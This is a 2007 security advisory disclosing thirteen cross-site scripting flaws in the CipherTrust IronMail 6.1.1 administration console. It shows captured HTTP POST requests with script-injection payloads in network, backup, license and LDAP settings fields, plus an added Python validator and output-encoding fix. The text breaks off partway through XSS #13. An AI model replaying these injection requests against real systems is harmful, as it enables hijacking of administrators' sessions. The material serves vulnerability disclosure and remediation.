Multiple XSS in IronMail

Found multiple XSS in IronMail.

See attached advisory. Spanish version at http://www.514.es.

Regards,

- J
          ===============================
                   - Advisory -
          ===============================
  
   Title:   Multiple XSS in CipherTrust IronMail 6.1.1
    Risk:   Medium
    Date:   20.Feb.2007
  Author:   Javier Olascoaga <jolascoaga *at* 514.es>      
     WEB:   http://www.514.es/


.: [ INTRO ] :.
	
IronMail protects enterprise email systems from inbound threats: spam, viruses,
or hackers trying to take down or take over the e-mail system. IronMail protects
enterprise email systems from outbound threats: regulatory compliance violations,
corporate policy violations, or theft ("leakage") of confidential information
or intellectual property. IronMail protects enterprise email systems from
threats that haven't even been identified yet.

.: [ TECHNICAL DESCRIPTION ] :.

During technical testing of the IronMail mail system, several Cross Site
Scripting vulnerabilities were detected in the administration console of the
product.


The XSS issues found are listed below:

.: [ XSS #1 ] :.

POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer:
https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11;
/admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=;
JSESSIONID=B227892A258E91419C09469E49AED4D4
rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit


.: [ XSS #2 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #3 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #4 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #5 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #6 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #7 ] :.

POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8


.: [ XSS #8 ] :.

POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
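
Added example, not part of the original advisory and not vendor code: a server-side allowlist check for the network-settings forms in XSS #2 to #8, followed by output encoding for whatever gets echoed back into the page. The field types are inferred from the sample values in the requests above; the MTU range, the single-quoted attribute in render_input, and all function names are assumptions.

```python
import html
import ipaddress
import re
from urllib.parse import parse_qsl, urlencode

_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
_TOKEN = re.compile(r"[A-Za-z0-9_+-]+(/[A-Za-z0-9_+-]+)*")


def is_ipv4(value):
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def is_netmask(value):
    # Dotted-quad netmasks only: prefix lengths and host masks fail the round-trip.
    try:
        return str(ipaddress.IPv4Network("0.0.0.0/" + value).netmask) == value
    except ValueError:
        return False


def is_hostname(value):
    return len(value) <= 253 and all(_LABEL.fullmatch(p) for p in value.split("."))


def is_token(value):
    return _TOKEN.fullmatch(value) is not None


def int_in(lo, hi):
    return lambda v: v.isascii() and v.isdigit() and lo <= int(v) <= hi


# One rule per field name seen in the XSS #2-#8 requests (types are assumptions).
RULES = {
    "mtu": int_in(68, 9000),  # assumed range
    "hostName": is_hostname, "domainName": is_hostname,
    "ipAddress": is_ipv4, "ipNetMask": is_netmask, "defaultRouter": is_ipv4,
    "dns1": is_ipv4, "dns2": is_ipv4, "dns3": is_ipv4,
    "ntp1": is_hostname, "ntp2": is_hostname, "ntp3": is_hostname,
    "timeZone": is_token, "ethernetSetting": is_token,
    "outOfBand": lambda v: v in ("true", "false"),
    "submit": lambda v: v == "Submit",
}


def validate_form(body):
    """Return {field: decoded value} for every field that fails its rule.

    Unknown field names are rejected as well (allowlist, not blocklist).
    """
    rejected = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        rule = RULES.get(name)
        if rule is None or not rule(value):
            rejected[name] = value
    return rejected


def render_input(name, value):
    """Second layer: encode on output so a value cannot close the attribute."""
    return "<input type='text' name='%s' value='%s'>" % (
        html.escape(name, quote=True), html.escape(value, quote=True))


# Test string used throughout the advisory, and the XSS #8 request body.
MARKER = "'><script>alert('SIA')</script>"
XSS8_BODY = ("outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29"
             "%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224"
             "&submit=Submit")

# Field values from the XSS #2-#7 requests with the test string taken out.
BASELINE = {
    "mtu": "1500", "hostName": "mmail11", "domainName": "sytes.net",
    "ipAddress": "10.1.1.1", "ipNetMask": "255.255.255.224",
    "defaultRouter": "10.1.1.2", "dns1": "10.1.1.3", "dns2": "10.1.1.4",
    "dns3": "10.1.1.5", "ntp1": "time.nist.gov", "ntp2": "bitsy.mit.edu",
    "ntp3": "clock.isc.org", "timeZone": "Europe/Madrid",
    "ethernetSetting": "autoselect", "submit": "Submit",
}


def baseline_body():
    return urlencode(BASELINE)


def rejected_when_marked(field):
    """Re-create one of the XSS #2-#7 bodies and run it through the validator."""
    return validate_form(urlencode(dict(BASELINE, **{field: MARKER})))


if __name__ == "__main__":
    print("XSS #8 body rejected fields:", validate_form(XSS8_BODY))
    print("clean body rejected fields:", validate_form(baseline_body()))
    for field in ("hostName", "domainName", "ipAddress", "defaultRouter", "dns1", "dns2"):
        print(field, "->", rejected_when_marked(field))
    print(render_input("ipAddress", MARKER))
```

Validation rejects the request before it is stored; the encoding step still matters for values that were saved before validation existed or that reach the page by another path.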

.: [ XSS #9 ] :.

POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #10 ] :.

POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=17;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1;
menusToExpand=%2CConfigurationMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
license=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #11 ] :.

POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenuToggled=1&procId=90
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 1225
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=15;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.do%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2C;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&rows%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelValueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D.attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:21:27 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #12 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=init&procId=164
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAccountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLDAPConfigurationMenu%2C;
/admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=;
JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E
procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows%5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows%5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&rows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&rows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&rows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyable=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&rows%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attrType=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&rows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D.attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attrType=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=%5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4%5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId=2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_intvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.multipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone=5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D.attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidate=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean
%5BRESTART%2C+1%5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5%5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMATION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&rows%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.langTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.attrValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows%5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.langTagId=2016408&submitValue=Submit
HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:22:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #13 ] :.

POST
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer:
https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method=save
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 2840
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin;
tabbedMenuSelected=11;
itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceProperties.do%3Fmethod%3Dinit%26procId%3D164;
